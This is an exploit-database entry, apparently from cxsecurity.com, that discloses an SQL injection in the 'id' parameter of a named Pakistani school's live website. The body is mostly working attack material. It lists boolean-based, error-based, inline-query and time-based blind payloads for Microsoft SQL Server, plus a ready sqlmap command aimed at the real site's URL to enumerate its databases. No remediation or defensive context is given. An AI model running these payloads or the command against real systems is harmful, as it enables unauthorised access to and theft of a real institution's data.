Nice Education System Peshawar SQL Injection

2019.09.23
tr Ahmet Bozkurt (TR) tr
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title : Nice Education System Peshawar SQL Injection # Author : Ahmet Bozkurt # Date : 23/09/2019 # Vendor Homepage : http://www.niceeducationsystem.edu.pk # Tested On : Kali Linux # Category : WebSite # Exploit Risk : Medium ############################################################################## # Exploit /index.php?id=[SQL Injection] Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=6) AND 3391=3391 AND (4096=4096 Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN) Payload: id=6) AND 6970 IN (SELECT (CHAR(113)+CHAR(112)+CHAR(118)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (6970=6970) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(118)+CHAR(112)+CHAR(122)+CHAR(113))) AND (1245=1245 Type: inline query Title: Microsoft SQL Server/Sybase inline queries Payload: id=(SELECT CHAR(113)+CHAR(112)+CHAR(118)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (6826=6826) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(118)+CHAR(112)+CHAR(122)+CHAR(113)) Type: time-based blind Title: Microsoft SQL Server/Sybase OR time-based blind (heavy query) Payload: id=6) OR 4100=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND (2695=2695 # SQLMap python sqlmap.py -u ""http://www.niceeducationsystem.edu.pk/index.php?id=31" --dbs ############################################################################## Special Thanks: Jeng4L - imhatimi


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top